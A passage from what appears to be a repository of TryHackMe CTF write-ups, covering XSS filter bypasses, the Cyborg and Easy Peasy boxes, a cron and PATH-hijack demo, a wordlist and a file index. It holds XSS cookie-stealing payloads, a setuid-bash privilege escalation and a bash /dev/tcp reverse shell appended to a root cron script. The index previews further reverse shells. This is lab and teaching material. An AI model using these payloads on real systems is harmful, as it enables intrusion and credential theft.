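    """Program a cron command line starts with, ignoring a leading 'cd DIR &&'."""
    tokens = shlex.split(command)
    if len(tokens) >= 4 and tokens[0] == "cd" and tokens[2] == "&&":
        tokens = tokens[3:]
    return tokens[0] if tokens else ""


def writable_cron_targets(crontab_text):
    """[(user, program)] for jobs whose program file the current user can write to."""
    hits = []
    for user, command in cron_commands(crontab_text):
        program = first_program(command)
        if os.path.isabs(program) and os.access(program, os.W_OK):
            hits.append((user, program))
    return hits


def writable_demo():
    """Plant a writable script, reference it from a cron line and confirm the audit flags it."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "autoscript.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\necho backup\n")
        crontab = SAMPLE_CRONTAB + f"* * * * * root {script}\n"
        return [path for _, path in writable_cron_targets(crontab)] == [script]


def make_fake_ls(directory):
    """The room's `echo "/bin/bash" > ls; chmod +x ls`, with a harmless marker instead of a shell."""
    path = os.path.join(directory, "ls")
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho HIJACKED\n")
    os.chmod(path, 0o755)
    return path


def run_with_path(command, path_value):
    """Run a shell command under a given PATH (as the SUID script would) and return stdout."""
    env = dict(os.environ, PATH=path_value)
    result = subprocess.run(["sh", "-c", command], env=env, capture_output=True, text=True)
    return result.stdout.strip()


def path_hijack_demo():
    """(output of a bare `ls` with /tmp-style PATH, output once the script resets PATH)."""
    with tempfile.TemporaryDirectory() as tmp:
        make_fake_ls(tmp)
        # what `export PATH=/tmp:$PATH` does, with the temp dir standing in for /tmp
        attacker_path = tmp + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
        vulnerable = run_with_path("ls -d /", attacker_path)
        hardened = run_with_path("PATH=/usr/bin:/bin; export PATH; ls -d /", attacker_path)
        return vulnerable, hardened


if __name__ == "__main__":
    print("writable cron target found:", writable_demo())
    bare, fixed = path_hijack_demo()
    print(f"bare 'ls' with attacker PATH -> {bare!r}; after PATH reset -> {fixed!r}")
```

Run it as the low-privileged user on the box after swapping `SAMPLE_CRONTAB` for the contents of `/etc/crontab`; every hit is a file root will execute for you. The hardened half shows the fix the script author should have applied: set PATH explicitly (or call `/bin/ls` by absolute path) before running anything from a privileged context.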
================================================
FILE: Cross-site-Scripting/README.md
================================================
# Cross-site Scripting
- Read the introduction.
no answer needed
- Deploy the machine and navigate to http://<TARGET_IP>
no answer needed
- The machine you deployed earlier will guide you through exploiting some of the vulnerabilities stored XSS has to offer. There are hints for answering these questions on the machine.
no answer needed
- Add a comment and see if you can insert some of your own HTML.
- `<p>comment</p>`
- `HTML_****`
- Create an alert popup box appear on the page with your document cookies.
- `<script>alert(document.cookie)</script>`
- `W3LL_***********`
- Change "XSS Playground" to "I am a hacker" by adding comments and using Javascript.
- ` <script>document.getElementById('thm-title').innerHTML="I am a hacker"</script>`
- `websites****************************`
- Take over Jack's account by stealing his cookie, what was his cookie value?
- `s%3Aat0YY*******************************************************`
- Post a comment as Jack.
- `c00k***********`
- Craft a reflected XSS payload that will cause a popup saying "Hello"
- `<script>alert("Hello")</script>`
- `There**************************`
- Craft a reflected XSS payload that will cause a popup with your machine's IP address.
- `<script>alert(window.location.hostname)</script>`
- `Ref***************`
- Look at the deployed machine's DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.
- `test ' onmouseover="alert(document.cookie)"`
- `Br******************`
- Create an onhover event on an image tag that changes the background color of the website to red.
- `test " onhover="document.body.style.backgroundColor='red'`
- Note that `onhover` is not a real DOM event; if you want the handler to actually fire in a browser, use `onmouseover`.
- `Jav**************`
- Understand the basic proof of concept script.
no answer needed
- Create your own version of an XSS keylogger and see it appear in the logs part of the site.
no answer needed
- Bypass the filter that removes any script tags.
- `<img src="edoardottt" onerror=alert("Helloooo") />`
- `3c3cf****************************`
- The word alert is filtered, bypass it.
- Same payload as above, with `confirm` in place of `alert`.
- `a2e5e*****************************`
- The word hello is filtered, bypass it.
- Same payload, with the string `Hi :)` instead of `hello`.
- `decb*****************************`
- Challenge 4 filters the lowercase handler name; the same payload with the attribute name upper-cased gets through, because HTML attribute names are case-insensitive while the filter is not.
- `<img src="edoardottt" ONERROR="alert('edoardottt')" />`
- `2482d2****************************`
- Download and experiment with BeEF with the XSS playground.
no answer needed
- Take a look at XSS-Payloads.com, download one interesting looking payload and use it on the XSS playground.
no answer needed
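The four filter-bypass challenges fail in the same way: a blacklist deletes one token (`<script>`, `alert`, `hello`, a lowercase handler name) and the payload is simply reworded around it. The Python snippet below is an added example, not the room's code. It reimplements the filters in the shape the bypass payloads imply (the room's real filter code is not shown on this page, so this is an assumption), runs the payloads used above through them, and contrasts that with HTML output encoding via `html.escape`, which is what actually stops the injection in an HTML text context.

```python
#!/usr/bin/env python3
"""Added example: why the blacklist filters in these challenges fail, and what works instead."""
import html
import re

# Payloads taken from or modelled on the ones used in the challenges above.
PAYLOADS = {
    "script": '<script>alert("Hello")</script>',
    "img_alert": '<img src="edoardottt" onerror=alert("Helloooo") />',
    "img_confirm": '<img src="edoardottt" onerror=confirm("Hi :)") />',
    "img_upper": '<img src="edoardottt" ONERROR="alert(\'edoardottt\')" />',
}


# Filters as the challenges appear to implement them (assumed shape).
def strip_script_tags(s):
    """Challenge 1: delete <script>...</script> blocks, case-insensitively."""
    return re.sub(r"<script\b[^>]*>.*?</script\s*>", "", s, flags=re.I | re.S)


def strip_word(s, word):
    """Challenges 2-4: delete one banned word with a case-sensitive replace."""
    return s.replace(word, "")


# The real fix: encode for the context the data lands in (here, HTML text).
def escape_for_html_text(s):
    return html.escape(s, quote=True)


# A tag carrying an on*= handler that calls a function, or a <script> tag.
ACTIVE = re.compile(
    r"<\s*[a-z][^>]*\bon[a-z]+\s*=\s*['\"]?\s*[a-z_]\w*\s*\(|<\s*script\b", re.I
)


def still_executes(markup):
    """True if the (filtered) string would still run JavaScript when rendered as HTML."""
    return bool(ACTIVE.search(markup))


def filter_report(payload):
    """Which defences does a payload survive? Maps defence name -> still executes."""
    return {
        "strip_script_tags": still_executes(strip_script_tags(payload)),
        "strip_alert": still_executes(strip_word(payload, "alert")),
        "strip_onerror": still_executes(strip_word(payload, "onerror")),
        "html_escape": still_executes(escape_for_html_text(payload)),
    }


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name:12s} {filter_report(payload)}")
```

Every blacklist row has at least one payload that survives it (a different tag, a different function, a different case), while the `html_escape` column is False for all of them: the browser renders `&lt;img ...&gt;` as text, so there is nothing left to bypass.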
================================================
FILE: Cyborg/README.md
================================================
# Cyborg
- Deploy the machine
no answer needed
- Scan the machine, how many ports are open?
- `scilla port -target <TARGET_IP>`
- `*`
- What service is running on port 22?
- `ssh`
- What service is running on port 80?
- `http`
- What is the user.txt flag?
- Go to `http://<TARGET_IP>/etc`: directory listing is enabled.
- `http://<TARGET_IP>/etc/squid/passwd` is an htpasswd-style file with one `username:hash` entry.
- Run `hash-identifier` on the hash: it is Apache `$apr1$` MD5, hashcat mode 1600.
- `echo '<hash>' > hash`
- `hashcat --force -m 1600 -a 0 hash /home/kali/rockyou.txt`
- `ssh username@<TARGET_IP>` and enter the cracked password.
- `scilla dir -target <TARGET_IP>`
- `/admin/` found!
- Go to the admin page and download the archive.tar file.
- `tar -xvf archive.tar`
- The unpacked directory is a [Borg](https://borgbackup.readthedocs.io/en/stable/) backup repository.
- Install borg.
- `borg extract <extracted_repo_dir>::music_archive` (point borg at the repository directory unpacked from the tarball, not at the tarball itself; if the repository is encrypted, borg prompts for its passphrase).
- Inside the extracted archive you find the SSH credentials.
- `ssh ****@<TARGET_IP>` and enter the password.
- `cat user.txt`
- `flag{************************************}`
- What is the root.txt flag?
- `sudo -l`: the user may run `/etc/mp3backups/backup.sh` as root.
- `cat /etc/mp3backups/backup.sh`: the value passed to its `-c` option is executed by the script, i.e. as root.
- `sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"`
- `bash -p` (the `-p` flag keeps the setuid effective UID; without it bash drops the privileges again).
- `cat /root/root.txt`
- `flag{***********************************}`
================================================
FILE: Easy-Peasy/README.md
================================================
# Easy Peasy
- How many ports are open?
- `nmap <TARGET_IP>`
- `3`
- What is the version of nginx?
- `nmap -sV <TARGET_IP>`
- `1.16.1`
- What is running on the highest port?
- `apache`
- Using GoBuster, find flag 1.
- `gobuster dir -u http://<TARGET_IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
- We find `/hidden`.
- Recurse into it: `gobuster dir -u http://<TARGET_IP>/hidden/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
- We find `/whatever`
- Inspect page source.
- `ZmxhZ3tmMXJzN19mbDRnfQ==`
- `echo -n ZmxhZ3tmMXJzN19mbDRnfQ== | base64 -d`
- `flag{f1rs7_fl4g}`
- Further enumerate the machine, what is flag 2?
- Remember that nmap found a second web server on a high port: go to `http://<TARGET_IP>:65524`.
- Running the same gobuster command against this server shows a robots.txt file.
- It contains the hash `a18672860d0510e5ab6699730763b250`.
- `hash-identifier` (32 hex characters, so most likely MD5); look it up in an online hash database.
- `flag{1m_s3c0nd_fl4g}`
- Crack the hash with easypeasy.txt. What is flag 3?
- Inspect the source code of the default Apache page on port 65524.
- `flag{9fdafbd64c47471a8f54cd3fc64cd312}`
- What is the hidden directory?
- The source of the Apache index page (port 65524) contains `its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu`.
- Try the base-N decoders in CyberChef.
- It is base62: `/n0th1ng3ls3m4tt3r`.
- Using the wordlist provided in this task, crack the hash. What is the password?
- Browse to that directory and inspect the page source.
- `940d71e8655*********8ab85066**********418**********83e7f5fe6*d81`
- `hash-identifier` lists several 256-bit candidates for a 64-character hex digest; the one that cracks is GOST.
- `john --wordlist=easypeasy.txt --format=gost hash.txt`
- `mypass*************`
- What is the password to login to the machine via SSH?
- Download the central image on the page (`http://<TARGET_IP>:65524/n0th1ng3ls3m4tt3r`).
- `steghide extract -sf binarycodepixabay.jpg` and enter the password cracked above.
- The extracted file contains a username and a password written as binary octets.
- Convert the binary string to ASCII text.
- `***********************binary`
- What is the user flag?
- Log in via SSH (not on port 22: use the SSH port from the nmap output).
- `cat user.txt`
- The content is ROT13-encoded, not the flag itself; decode it.
- `flag{n0wi************}`
- What is the root flag?
- Look for cron jobs.
- `cat /etc/crontab`
- A job runs `/var/www/.mysecretcronjob.sh` as root, and the script is writable by our user.
- Whatever we put in that file is executed as root, so:
- Append a reverse shell to it: `/bin/bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1`
- On your machine: `nc -lnvp 4444`
- `cat /root/flag.txt` is not it; the flag is in a hidden file.
- `cat /root/.root.txt`
- `flag{63a**0e******05079**********1845}`
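Easy Peasy chains several encodings: base64 in the page source, base62 for the hidden directory, a binary string for the SSH password and ROT13 on `user.txt`. The Python module below is an added example, not part of the room or of this repository, that implements each decoder plus a small dispatcher that guesses which one applies. Base62 is implemented as big-integer base conversion with the alphabet `0-9A-Za-z`, which is assumed to be what CyberChef's "From Base62" uses; leading zero bytes are mapped to leading `0` digits (a base58-style convention assumed here so that encode and decode round-trip). The inputs in the usage and tests are constructed, apart from the base64 string that appears on this page.

```python
#!/usr/bin/env python3
"""Added example: decoders for the encodings met in Easy Peasy (base64, base62, binary, ROT13)."""
import base64
import binascii
import codecs
import re

# Assumed alphabet for base62 (0-9, then A-Z, then a-z), matching CyberChef's default.
B62_ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def b62_encode(data, alphabet=B62_ALPHABET):
    """Bytes -> base62 digits, big-endian. Leading zero bytes become leading '0' digits
    (assumed convention, so that encode/decode round-trip)."""
    n = int.from_bytes(data, "big")
    digits = ""
    while n:
        n, r = divmod(n, 62)
        digits = alphabet[r] + digits
    leading = len(data) - len(data.lstrip(b"\x00"))
    return alphabet[0] * leading + digits


def b62_decode(text, alphabet=B62_ALPHABET):
    """Inverse of b62_encode: read the digits as one big base-62 integer."""
    n = 0
    for ch in text:
        n = n * 62 + alphabet.index(ch)  # ValueError for characters outside the alphabet
    leading = len(text) - len(text.lstrip(alphabet[0]))
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return b"\x00" * leading + body


def bits_to_text(bits):
    """'01001000 01101001' -> 'Hi'. Whitespace between octets is optional."""
    compact = "".join(bits.split())
    if not compact or len(compact) % 8:
        raise ValueError("bit string must be a non-empty multiple of 8 bits")
    return bytes(int(compact[i:i + 8], 2) for i in range(0, len(compact), 8)).decode("ascii")


def rot13(text):
    return codecs.decode(text, "rot_13")


def _printable(data):
    return all(32 <= b < 127 for b in data)


def guess_and_decode(s):
    """Crude dispatcher for the encodings met in this room: returns (label, decoded bytes).

    Order matters: a base62 string is usually also valid base64 (the hidden-directory
    string on this box is), so base64 is only accepted when its output is printable ASCII.
    """
    compact = "".join(s.split())
    if compact and set(compact) <= {"0", "1"} and len(compact) % 8 == 0:
        return "binary", bits_to_text(compact).encode("ascii")
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact) and len(compact) % 4 == 0:
        try:
            out = base64.b64decode(compact, validate=True)
            if _printable(out):
                return "base64", out
        except (binascii.Error, ValueError):
            pass
    if re.fullmatch(r"[0-9A-Za-z]+", compact):
        return "base62", b62_decode(compact)
    return "unknown", s.encode()


if __name__ == "__main__":
    for sample in ("ZmxhZ3tmMXJzN19mbDRnfQ==",      # from the /hidden/whatever page source
                   "01001000 01101001",             # constructed binary octets
                   "ObsJmP173N2X6dOrAgEAL0Vu"):     # from the Apache index page source
        print(sample, "->", guess_and_decode(sample))
    print(rot13("synt{nop}"))                       # constructed ROT13 input
```

The printable-output check is what separates the second and third samples: both are syntactically valid base64, but only the first decodes to text, so the dispatcher falls through to base62 for the other. The same ambiguity is why the page source had to hint at the encoding with "ba....".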
================================================
FILE: Easy-Peasy/easypeasy.txt
================================================
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
louise
orange
789456
999999
shorty
11111
12345678
abc123
nicole
daniel
babygirl
monkey
lovely
jessica
654321
michael
ashley
qwerty
111111
iloveu
000000
michelle
tigger
sunshine
12345678
abc123
nicole
daniel
babygirl
monkey
lovely
jessica
654321
michael
ashley
qwerty
111111
iloveu
000000
michelle
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
abc123
nicole
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
abc123
nicole
daniel
babygirl
monkey
lovely
jessica
654321
michael
ashley
qwerty
111111
iloveu
daniel
babygirl
monkey
lovely
jessica
654321
michael
ashley
qwerty
111111
iloveu
tigger
sunshine
chocolate
password1
soccer
anthony
paintball
love4u
},
{
"path": "Introduction-to-OWASP-ZAP/README.md",
"chars": 969,
"preview": "# Introduction to OWASP ZAP\n\n- What does ZAP stand for?\n\n\t- `Zed Attack proxy`\t\n\n- Connect to the TryHackMe network and "
},
{
"path": "Introductory-Networking/README.md",
"chars": 5207,
"preview": "# Introductory Networking\n\n- Let's get started!\n\n\t no answer needed\n\n- Which layer would choose to send data over TCP o"
},
{
"path": "JavaScript-Basics/README.md",
"chars": 1125,
"preview": "# JavaScript Basics\n\n- Let's Begin\n\n\t no answer needed\n\n- What type of data type is this: 'Neo'?\n\n\t- `string`\n\n- What d"
},
{
"path": "JavaScript-Basics/sort.js",
"chars": 302,
"preview": "\nfunction sort(array) {\n\tfor (var i=1; i<array.length;i++) {\n\t\tfor (var j=0; j<i;j++) {\n\t\t\tif (array[i] < array[j]) {\n\t\t"
},
{
"path": "John-The-Ripper/README.md",
"chars": 2954,
"preview": "# John The Ripper\n\n- Read and understand the basic concepts of hashing and hash cracking\n\n\t no answer needed\n\n- What is"
},
{
"path": "Jurassic-Park/README.md",
"chars": 1492,
"preview": "# Jurassic Park\n\n- What is the SQL database called which is serving the shop information?\n\n\t- `scilla port -target <TARG"
},
{
"path": "LFI/README.md",
"chars": 1307,
"preview": "# LFI\n\n- Deploy the VM and access its web server: `http://<TARGET_IP>`\n\n\t no answer needed\n\n- Look around the website. "
},
{
"path": "LFI-Basics/README.md",
"chars": 2571,
"preview": "# LFI Basics\n\n- Start the VM and access it using your browser.\n\n\t no answer needed\n\n- Access the first walkthrough, and"
},
{
"path": "LICENSE",
"chars": 35149,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
},
{
"path": "LazyAdmin/README.md",
"chars": 3026,
"preview": "# LazyAdmin\n\nHave some fun! There might be multiple ways to get user access.\n\n- What is the user flag?\n\n\t- `nmap -sV -sC"
},
{
"path": "LazyAdmin/hash.txt",
"chars": 32,
"preview": "42f749ade7f9e195bf475f37a44cafcb"
},
{
"path": "LazyAdmin/mysql_bakup_20191129023059-1.5.1.sql",
"chars": 4809,
"preview": "<?php return array (\n 0 => 'DROP TABLE IF EXISTS `%--%_attachment`;',\n 1 => 'CREATE TABLE `%--%_attachment` (\n `id` i"
},
{
"path": "LazyAdmin/rshell.php",
"chars": 5473,
"preview": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net"
},
{
"path": "Linux-Challenges/README.md",
"chars": 5818,
"preview": "# Linux Challenges\n\n- How many visible files can you see in garrys home directory?\n\n\t- `ssh garry@<TARGET_IP>` and enter"
},
{
"path": "Linux-Fundamentals/Linux-Fundamentals-Part-1/README.md",
"chars": 1465,
"preview": "# Linux Fundamentals - Part 1\n\n- Read the above\n\n\t no answer needed\n\n- Deploy the machine attached to this task!\nNOTE: "
},
{
"path": "Linux-Fundamentals/Linux-Fundamentals-Part-2/README.md",
"chars": 2019,
"preview": "# Linux Fundamentals - Part 2\n\n- Read the above.\n\n\t no answer needed\n\n- Deploy the machine attached to this task!\nNOTE:"
},
{
"path": "Linux-Fundamentals/Linux-Fundamentals-Part-3/README.md",
"chars": 1924,
"preview": "# Linux Fundamentals - Part 3\n\n- Read the above\n\n\t no answer needed\n\n- Deploy the machine attached to this task!\nNOTE: "
},
{
"path": "Linux-Strength-Training/README.md",
"chars": 9811,
"preview": "# Linux Strength Training\n\n- I have read and understood\n\n\t no answer needed\n\n- What is the correct option for finding f"
},
{
"path": "Linux:-Local-Enumeration/README.md",
"chars": 1176,
"preview": "# Linux: Local Enumeration\n\n- Let's go!\n\n\t no answer needed\n\n- How would you execute /bin/bash with perl?\n\n\t- `perl -e "
},
{
"path": "MAL:-REMnux-The_Redux/README.md",
"chars": 1099,
"preview": "# MAL: REMnux - The Redux\n\n- I'm all buckled up and ready to get started.\n\n\t no answer needed\n\n- I've deployed my insta"
},
{
"path": "NIS-Linux_Part_I/README.md",
"chars": 3164,
"preview": "# NIS - Linux Part I\n\n- What is shiba3's password?\n\n\t- `ssh chad@<TARGET_IP>` and enter password.\n\t- See [Linux Fundamen"
},
{
"path": "Nessus/README.md",
"chars": 3103,
"preview": "# Nessus\n\n- I have read the description!\n\n\t no answer needed\n\n- Go to https://www.tenable.com/products/nessus/nessus-es"
},
{
"path": "Network-Services/README.md",
"chars": 6118,
"preview": "# Network Services\n\n- Ready? Let's get going!\n\n\t no answer needed\n\n- What does SMB stand for?\n\n\t- `Server Message Block"
},
{
"path": "Network-Services-2/README.md",
"chars": 7925,
"preview": "# Network Services 2\n\n- Ready? Let's get going!\n\n\t no answer needed\n\n- What does NFS stand for?\n\n\t- `Network File Syste"
},
{
"path": "Networking/README.md",
"chars": 1926,
"preview": "# Networking\n\n- How many categories of IPv4 addresses are there?\n\n\t- `5`\n\n- Which type is for research? *Looking for a l"
},
{
"path": "Ninja-Skills/README.md",
"chars": 1902,
"preview": "# Ninja Skills\n\n- Which of the above files are owned by the best-group group(enter the answer separated by spaces in alp"
},
{
"path": "Nmap/README.md",
"chars": 5477,
"preview": "# Nmap\n\n- Deploy the attached VM\n\n\t no answer needed\n\n- What networking constructs are used to direct traffic to the ri"
},
{
"path": "OWASP-Juice-Shop/README.md",
"chars": 5661,
"preview": "# OWASP Juice Shop\n\n\n- Deploy the VM attached to this task to get started! You can access this machine by using your bro"
},
{
"path": "OWASP-Juice-Shop/ftp/acquisitions.md",
"chars": 909,
"preview": "# Planned Acquisitions\n\n> This document is confidential! Do not distribute!\n\nOur company plans to acquire several compet"
},
{
"path": "OWASP-Juice-Shop/ftp/announcement_encrypted.md",
"chars": 369237,
"preview": "101090574497118278254226137710017536639773765857153659738605695408072928921910711582659759064103895163344910061580267891"
},
{
"path": "OWASP-Juice-Shop/ftp/coupons_2013.md.bak%00..md",
"chars": 131,
"preview": "n<MibgC7sn\nmNYS#gC7sn\no*IVigC7sn\nk#pDlgC7sn\no*I]pgC7sn\nn(XRvgC7sn\nn(XLtgC7sn\nk#*AfgC7sn\nq:<IqgC7sn\npEw8ogC7sn\npes[BgC7sn"
},
{
"path": "OWASP-Juice-Shop/ftp/eastere.gg%00.md",
"chars": 324,
"preview": "\"Congratulations, you found the easter egg!\"\n- The incredibly funny developers\n\n...\n\n...\n\n...\n\nOh' wait, this isn't an e"
},
{
"path": "OWASP-Juice-Shop/ftp/legal.md",
"chars": 3047,
"preview": "# Legal Information\n\nLorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy\neirmod tempor invidunt ut "
},
{
"path": "OWASP-Juice-Shop/ftp/package.json.bak%00.md",
"chars": 4425,
"preview": "{\n \"name\": \"juice-shop\",\n \"version\": \"6.2.0-SNAPSHOT\",\n \"description\": \"An intentionally insecure JavaScript Web Appl"
},
{
"path": "OWASP-Juice-Shop/ftp/quarantine/juicy_malware_linux_amd_64.url",
"chars": 162,
"preview": "[{000214A0-0000-0000-C000-000000000046}]\nProp3=19,11\n[InternetShortcut]\nURL=https://github.com/J12934/juicy-malware/raw/"
},
{
"path": "OWASP-Juice-Shop/ftp/quarantine/juicy_malware_linux_arm_64.url",
"chars": 162,
"preview": "[{000214A0-0000-0000-C000-000000000046}]\nProp3=19,11\n[InternetShortcut]\nURL=https://github.com/J12934/juicy-malware/raw/"
},
{
"path": "OWASP-Juice-Shop/ftp/quarantine/juicy_malware_macos_64.url",
"chars": 158,
"preview": "[{000214A0-0000-0000-C000-000000000046}]\nProp3=19,11\n[InternetShortcut]\nURL=https://github.com/J12934/juicy-malware/raw/"
},
{
"path": "OWASP-Juice-Shop/ftp/quarantine/juicy_malware_windows_64.exe.url",
"chars": 164,
"preview": "[{000214A0-0000-0000-C000-000000000046}]\nProp3=19,11\n[InternetShortcut]\nURL=https://github.com/J12934/juicy-malware/raw/"
},
{
"path": "OWASP-Juice-Shop/ftp/suspicious_errors.yml%00.md",
"chars": 723,
"preview": "title: Suspicious error messages specific to the application\ndescription: Detects error messages that only occur from ta"
},
{
"path": "OWASP-Top-10/47887.py",
"chars": 2109,
"preview": "# Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution\r\n# Google Dork: N/A\r\n# Date: 2020-01-07\r\n"
},
{
"path": "OWASP-Top-10/48973.txt",
"chars": 776,
"preview": "# Exploit Title: CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting\r\n# Date: 30/10/2020\r\n# Exploit Author: V"
},
{
"path": "OWASP-Top-10/README.md",
"chars": 9738,
"preview": "# OWASP Top 10\n\n\n\n\nThis room break"
},
{
"path": "OWASP-Top-10/login-logs.txt",
"chars": 700,
"preview": "200 OK 12.55.22.88 jr22 2019-03-18T09:21:17 /login\n200 OK 14.56.23.11 rand99 2019-03"
},
{
"path": "OWASP-Top-10/rce.py",
"chars": 428,
"preview": "# https://gist.githubusercontent.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3/raw/f0fce6310455d8c345bbc9ec81f41d224896b9"
},
{
"path": "Overpass/README.md",
"chars": 1669,
"preview": "# Overpass\n\n- Hack the machine and get the flag in user.txt\n\n\t- `nmap -sV -p- <TARGET_IP>`\n\t- `scilla dir -target <TARGE"
},
{
"path": "Overpass/downloads/src/buildscript.sh",
"chars": 41,
"preview": "bash -i >& /dev/tcp/<YOUR_IP>/1234 0>&1;\n"
},
{
"path": "Overpass2-Hacked/README.md",
"chars": 1975,
"preview": "# Overpass 2 - Hacked\n\n\n\nIf you ar"
},
{
"path": "Overpass2-Hacked/fasttrack.txt",
"chars": 1549,
"preview": "P@55w0rd\nP@ssw0rd!\nP@55w0rd!\nsqlsqlsqlsql\nSQLSQLSQLSQL\nWelcome123\nWelcome1234\nWelcome1212\nPassSql12\nnetwork\nnetworking\nn"
},
{
"path": "Persistence/README.md",
"chars": 353,
"preview": "# Persistence\n\n- Read the above.\n\n\t no answer needed\n\n- Read the above.\n\n\t no answer needed\n\n\t- This part is really we"
},
{
"path": "Pickle-Rick/README.md",
"chars": 1926,
"preview": "# Pickle Rick\n\nThis Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will "
},
{
"path": "Pickle-Rick/reverse-shell.sh",
"chars": 225,
"preview": "perl -e 'use Socket;$i=\"YOUR-IP-ADDRESS\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockad"
},
{
"path": "Post-Exploitation-Basics/README.md",
"chars": 444,
"preview": "# Post-Exploitation Basics\n\n- Deploy the Machine\n\n\tno answer needed\n\n- What is the shared folder that is not set by defa"
},
{
"path": "README.md",
"chars": 4420,
"preview": "<h2 align=\"center\">\n <b>TryHackMe notes, code, PoC, solutions, writeups, scribbles, drafts...</b>\n</h2>\n\n<p align=\"cent"
},
{
"path": "Regular-expressions/README.md",
"chars": 2884,
"preview": "# Regular expressions\n\n- Read the above.\n\n\t no answer needed\n\n- Match all of the following characters: c, o, g\n\n\t- `[co"
},
{
"path": "Res/README.md",
"chars": 1633,
"preview": "# Res\n\n- Scan the machine, how many ports are open?\n\n\t- `scilla port -target <TARGET_IP>`\n\t- `*`\n\n- What's is the databa"
},
{
"path": "RootMe/README.md",
"chars": 1324,
"preview": "# RootMe\n\n\n- Deploy the machine\n\n\tno answer needed\n\n- Scan the machine, how many ports are open?\n\n\t- `nmap <TARGET_IP>`\n"
},
{
"path": "RootMe/reverse-shell.php5",
"chars": 5492,
"preview": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net"
},
{
"path": "SSRF/README.md",
"chars": 252,
"preview": "# SSRF\n\n- Deploy the VM\n\n\t no answer needed\n\n- Read the above.\n\n\t no answer needed\n\n- Read the above.\n\n\t no answer ne"
},
{
"path": "Searchlight-IMINT/README.md",
"chars": 1615,
"preview": "# Searchlight - IMINT\n\n- Did you understand the flag format?\n\n\t- `sl{ready}`\n\n- What is the name of the street where thi"
},
{
"path": "Skynet/README.md",
"chars": 2364,
"preview": "# Skynet\n\n- What is Miles password for his emails?\n\n\t- `scilla port -target <TARGET_IP>`\n\t- 6 ports open...\n\t- Looking t"
},
{
"path": "Starting-Out-In-Cyber-Sec/README.md",
"chars": 320,
"preview": "# Starting Out In Cyber Sec\n\n- Read Me and Proceed!\n\n\t no answer needed\n\n- What is the name of the career role that is "
},
{
"path": "Startup/README.md",
"chars": 1836,
"preview": "# Startup\n\n- What is the secret spicy soup recipe?\n\n\t- `nmap -sV 10.10.96.10`\n\t- `ftp <TARGET_IP>` in anonymous mode\n\t- "
},
{
"path": "Startup/notice.txt",
"chars": 208,
"preview": "Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our websi"
},
{
"path": "Steel-Mountain/README.md",
"chars": 1672,
"preview": "# Steel Mountain\n\n- Who is the employee of the month?\n\n\t- Save that image and perform a reverse image search.\n\t- `Bill *"
},
{
"path": "Sublist3r/README.md",
"chars": 2806,
"preview": "# Sublist3r\n\n- You can find Sublist3r [here!](https://github.com/aboul3la/Sublist3r) We'll install this in the next task"
},
{
"path": "Sublist3r/sub-output-nbc.txt",
"chars": 4409,
"preview": "msnbc.com<BR>nbc.com\nwww.xn--12-nbc.com<BR>xn--12-nbc.com\nwww.nbc.com\n30rock.nbc.com\nacc-api.nbc.com\nacc-img.nbc.com\nacc"
},
{
"path": "The-Cod-Caper/README.md",
"chars": 2079,
"preview": "# The Cod Caper\n\n- Help me out! :)\n\n\t no answer needed\n\n- How many ports are open on the target machine?\n\n\t- `scilla po"
},
{
"path": "The-find-command/README.md",
"chars": 1730,
"preview": "# The find command\n\n- Read and follow the instructions.\n\n\t no answer needed\n\n- Find all files whose name ends with \".xm"
},
{
"path": "Toolbox-Vim/README.md",
"chars": 1988,
"preview": "# Toolbox: Vim\n\n- Install Vim\n\n\t no answer needed\n\n- Launch Vim\n\n\t no answer needed\n\n- How do we enter \"INSERT\" mode? "
},
{
"path": "ToolsRus/README.md",
"chars": 1209,
"preview": "# ToolsRus\n\n- What directory can you find, that begins with a \"g\"?\n\n\t- Considering using Scilla `scilla dir -target <TAR"
},
{
"path": "Tor/README.md",
"chars": 1961,
"preview": "# Tor\n\n- Run apt-get install tor to install/update your Tor packages\n\n\t no answer needed\n\n- Run `service tor start` to "
},
{
"path": "Upload-Vulnerabilities/README.md",
"chars": 3354,
"preview": "# Upload Vulnerabilities\n\n- Configure your hosts file for the task, as per the instructions above.\n\n\t no answer needed\n"
},
{
"path": "Web-Scanning/README.md",
"chars": 4461,
"preview": "# Web Scanning\n\n- Deploy the machine!\n\n\t no answer needed\n\n- First and foremost, what switch do we use to set the targe"
},
{
"path": "Wgel-CTF/README.md",
"chars": 804,
"preview": "# Wgel CTF\n\nHave fun with this easy box.\n\n- User flag\n\n\t- The first thing I notice is that the port 80 is open and it di"
},
{
"path": "What-the-Shell?/README.md",
"chars": 4331,
"preview": "# What the Shell?\n\n- Read and understand the introduction.\n\n\t no answer needed\n\n- Read the above and check out the link"
},
{
"path": "Windows-PrivEsc/README.md",
"chars": 1609,
